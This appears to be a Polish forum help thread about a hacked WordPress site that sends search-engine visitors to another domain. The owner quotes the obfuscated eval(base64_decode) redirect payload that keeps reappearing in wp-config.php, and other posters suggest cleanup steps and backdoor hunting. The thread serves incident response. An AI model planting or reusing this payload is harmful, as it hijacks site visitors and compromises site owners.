Witam serdecznie,
Mam u siebie na serwerze skrypt WordPress 3.0.1–pl_PL
A do dwóch dni po wyszukaniu mojej strony w google, jak na nią kliknę to przekierowuje mnie na inne strony
Doczytałem się że to evalbase64

Niestety, przeszukałem wiele stron i tyle co umiałem się doczytać po angielsku NIE umiem się tego pozbyć
każde usunięcie kodu z wp-config skutkuje tylko na chwilę, po paru godzinach kod znowu wraca i dalej przekierowuje mnie na inną stronę.

Czy ktoś zna jakieś rozwiązanie na ten problem ??

Dziękuję.

1. Jaki kod usuwasz?
2. Podaj adres strony, i frazy w google na jakie go znajdujesz.

A więc
Strona to www.kamieniecwr.pl wchodząc z linku wejdziesz
wyszukując w google frazy: kamieniec wrocławski 3 pozycja
klikasz i masz przekierowanie.

skrypt ze strony: http://wordpress-polska.org/download/wordpress

Polski WordPress 2.8.4 PL XXL

Kod który skasuję i po skasowaniu strona wchodzi normalnie jest w pliku: wp-config.php
w pierwszej lini.

Kod to : eval(base64_decode("ZXJyb3JfcmVwb3J0aW5nKDApOw0KJG5jY3Y9aGVhZGVyc19zZW50KCk7DQppZiAoISRuY2N2KXs
NCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YT0kX1NFUlZFUlsnSFRUUF9VU0V
S
X0FHRU5UJ107DQppZiAoc3RyaXN0cigkcmVmZXJlciwieWFob28iKSBvciBzdHJpc3RyKCRyZWZlcmVy
L
CJnb29nbGUiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiaW5nIikpIHsNCglpZiAoIXN0cmlzdHIoJHJlZ
m
VyZXIsInNpdGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiY2FjaGUiKSBvciAhc3RyaXN0cigkcmVmZX
J
lciwiaW51cmwiKSl7CQkNCgkJaGVhZGVyKCJMb2NhdGlvbjogaHR0cDovL2Fsb2xpcG9sb2xpLm9zYS5
w
bC8iKTsNCgkJZXhpdCgpOw0KCX0NCn0NCgl9"));

Dodam tylko że już 3x zamieniałem Hasła, robiłem nowe bazy, zmieniałem wszystko co mogę.
Po instalacji wszystko działa normalnie, nie widać zmian... po paru godzinach ten kod SAM dokleja sie do pliku i po wyszukaniu w google przekieruje na inne strony.
Skasuje ten kod, to po wyszukaniu w google strona wchodzi normalnie... przez pare godzin... potem znowu przekierowuje i kod się pojawia.
Mimo to że nic nie zmienię w panelu. Nawet nie loguje się na admina... co bym nie robił, zmieniał bazy danych, hasła, kasował KOD, kod zawsze się sam dodaje i po wyszukaniu w google strony kamieniec wrocławski przekieruje mnie gdzie indziej.

Jak wpiszesz stronę jako adres w przeglądarce wszystko ZAWSZE będzie działać

Cwane



Pobierz najnowszą wersję WP, ale z oficjalnej strony, a nie z tego trupa:
http://pl.wordpress.org/

Do tego, zmieniałeś 3x hasło - od czego? Od FTP? Zmień je jeszcze raz - i nie zapamiętuj hasła. Używasz Total Commandera? Zmień go, polecam wtyczkę do FF, FireFTP. Po nowej instalce ( albo aktualizacji, wszystkie pliki poza katalogiem wp-content skasuj, i wgraj nowe z instalki, poza katalogiem wp-content. Możesz także zmienić na jakiś czas szablon na standardowy, znajdziesz go w nowych plikach, wp-content/themes/twentyteen/ - czy jakoś tak ), zmieniasz hasło do FTP, zmieniasz klienta FTP, nie zapisujesz haseł, sprawdzasz czy działa - pewnie ze 24h wystarczą. I na sam koniec, przeskanuj sobie kompa jakimś dobrym antywirusem, bo masz syf.

Witam,
jeżeli chodzi o hasło to miałem na myśli FTP, bazę danych.

Nie aktualizowałem tamtego skryptu gdyż był on nowy, postawiłem wszystko na nowych hasłach oraz na nowej bazie jeszcze raz.
Odpukać już od rana strona działa, zobaczymy dalej.

Postawiłem oczywiście skrypt z linku jaki mi podałeś, nawet sam proces instalacji wyglądał inaczej.

Jeżeli chodzi o zapamiętywanie haseł to NIGDY nie daj takiej możliwości przeglądarce, zawsze wpisuje ręcznie.

Na razie działa i bardzo dziękuję.
Mam nadzieję że nie wrócę do tego tematu.

Pozdrawiam
m

Chodzi o zapamiętywanie hasła do FTP w kliencie FTP. Kompa z syfu oczyść, bo bez tego problem wróci.

A więc parę dni działo, dzisiaj znowu kod dodany do strony, nie wiem jakim cudem.
Mam nowe hasła na bazę ftp, całkiem inny prefix, nie wiem już jak temu zapowiedz.

Nie przechowuje na kompie żadnych haseł, skanowałem całego kompa adware i spybotem, z antywirusów AVG oraz awast
Może jakiś inny pomysł??

Po edycji tego kodu otrzymałem takie coś:


Parse error: syntax error, unexpected $end in /home/kamieniecw/domains/kamieniecwr.pl/public_html/wp-config.php(1) : eval()'d code on line 1

Warning: Cannot modify header information - headers already sent by (output started at /home/kamieniecw/domains/kamieniecwr.pl/public_html/wp-config.php(1) : eval()'d code:1) in /home/kamieniecw/domains/kamieniecwr.pl/public_html/wp-includes/pluggable.php on line 890

Ten post edytował bias 25.10.2010 - 18:11

Problem z tym komunikatem błędu był poruszany nie raz na forum - na pewno znajdziesz odpowiedź. Natomiast co do samego kodu - napisz do administracji hostingu, aby po logach doszła do tego, w jaki sposób jest dodawany ten kod do pliku wp-config.php

Ok, ostatni raz piszę i może ktoś znajdzie jakieś rozwiązanie.

1. format laptop
2. instalacja podstawowych rzeczy, grafika, net, antywirus, firewall, spybot
3. scan online, mks, node32, f-secure, wszystko czyste bez wirusów
4. usunięcie bazy danych z phpMyAdmin ->
5. zmiana haseł dostępu, do panelu i do ftp
6. Postawienie nowej bazy danych na całkiem nowych hasłach wcześnie nie używanych.
7. Instalacje WP ze strony http://pl.wordpress.org/ za pomocą FireFTP, NIE posiadam żadnych TC commanderów
8. Po 30 minutach miałem już dopisany kod do wp-config.php

Administracja serwera "cal.pl" twierdzi że z ich strony jest wszystko bezpieczne a dopisywanie kodu odbywa się zdalnie,
mam się z tą sprawą zgłosić do twórcy scryptu.

I niech mi ktoś powie,
co jest grane.

Może jednak jest coś w kodzie WP ??

Nic nie ma. Nie raz pobierałem z oficjalnej strony WP. Może spróbuj zmienić hosting, bo już nie mam pomysłu. Jesteś pewien że masz czystego kompa. Powiedz może z jakiego klienta FTP korzystasz?

Do ftp posłużyłem się tym razem FireFTP, mało tego nie wpisywałem danych na stałe tylko robiłem przez Quickconneckt.
Miałem na tym serwerze tylko pod inną domeną inny serwis postawiony, miałem tam trzy domeny i na dwóch WP wersja 2.8 jakoś tak i działało koło dwóch lata.
Tak więc też nie sądzę żeby to byłą wina serwera. W sumie jestem u nich 5 lat i nigdy nie miałem z nimi problemów stawiając tam naprawdę sporą ilość stron i małych portali.

Tak jak mi odpisali to ze kod jest gdzieś w plikach który pozwala na zdalne dopisanie kodu.

Szukając po sieci wszystkiego trafiłem na takie coś:



Niestety, nie wiem i nie mam pojęcia jak posłużyć się tym, finderem tym bardziej pod Windowsem
Może tobie to coś mówi i będziesz w stanie coś zrobić.

Pozdrawiam
M

Ten post edytował bias 28.10.2010 - 06:37

Napisz do hostingu, jeżeli to faktycznie jest backor, to powinni oni mieć opcję wyśledzenia jaki plik za to odpowiada, jaki plik jest wywoływany przed dodaniem kodu. Jeżeli wszystko zostało od nowa postawione, to albo jest to felerny szablon, albo pozostałe blogi są zarażone. Innym wyjściem jest to, że komuś zlecałeś coś na serwerze, przed płatnością zostawił sobie backdora, i ze względu na brak zapłaty teraz się klientowi odwdzięcza ... często spotykana usługa.

Nigdy nie dawałem nikomu dostępu do serwera ani na moje konto ani nie robiłem nikomu kont na dostęp do serwera.
Napiszę jeszcze raz ro supportu, dam znać jak dostanę odpowiedź.

A więc dostałem taka odpowiedź od supportu cal.pl

Jakie pytanie im zadałeś? Oprogramowanie domyślnie jest czyste, ale Ty możesz mieć jakiś plik wykorzystywany jako backdor, wystarczyło albo dodać jakiś plik, albo trochę kodu dopisać. W związku z czym, niech oni przejrzą logi, i sprawdzą który plik był odpalany w momencie dodawania kodu do pliku wp-config.php ... mogą to sprawdzić, ale im się pewnie nie chce, cóż, tylko pogratulować hostingu.